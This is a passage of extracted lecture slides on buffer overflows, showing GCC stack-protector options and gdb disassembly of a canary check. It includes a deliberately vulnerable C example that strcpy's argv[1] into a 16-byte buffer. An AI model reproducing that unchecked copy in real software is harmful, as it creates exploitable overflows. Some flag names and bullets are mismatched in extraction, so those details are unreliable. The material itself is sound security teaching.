hibari[12:15]

hibari[8:11]

hibari[4:7]

hibari[0:3]

deadcafe

deadbeef

EBP

ESP

Page 62: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

62

Stack protector

• fstack-protector vs fstack-protector-all• fstack-protector protects only vulnerable functions

• E.g. sizeof(char_array) > 8• fstack-protector protects all functions in the program

• No exception

Page 63: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

63

Stack protector

• modern.c

#include <string.h>

int pwn(){ int no_char; return 0;}

int main(int argc, char* argv[]) { int deadbeef = 0xDEADBEEF; int deadcafe = 0xDEADCAFE; char hibari[16];

pwn(); strcpy(hibari, argv[1]); return 0;}

Page 64: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

64

Stack protector

• fstack-protector$ gcc modern.c –o modern_fno_stack_protector –fno-stack-protector(gdb) disass pwnDump of assembler code for function pwn: 0x0804846d <+0>: push ebp 0x0804846e <+1>: mov ebp,esp 0x08048470 <+3>: mov eax,0x0 0x08048475 <+8>: pop ebp 0x08048476 <+9>: ret

Page 65: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

65

Stack protector

• fstack-protector-all$ gcc modern.c –o modern_fno_stack_protector_all –fno-stack-protec-tor-all(gdb) disass pwnDump of assembler code for function pwn: 0x0804846d <+0> : push ebp 0x0804846e <+1> : mov ebp,esp 0x08048470 <+3> : sub esp,0x18 0x08048473 <+6> : mov eax,gs:0x14 0x08048479 <+12>: mov DWORD PTR [ebp-0xc],eax 0x0804847c <+15>: xor eax,eax 0x0804847e <+17>: mov eax,0x0 0x08048483 <+22>: mov edx,DWORD PTR [ebp-0xc] 0x08048486 <+25>: xor edx,DWORD PTR gs:0x14 0x0804848d <+32>: je 0x8048494 <pwn+39> 0x0804848f <+34>: call 0x8048330 <__stack_chk_fail@plt> 0x08048494 <+39>: leave 0x08048495 <+40>: ret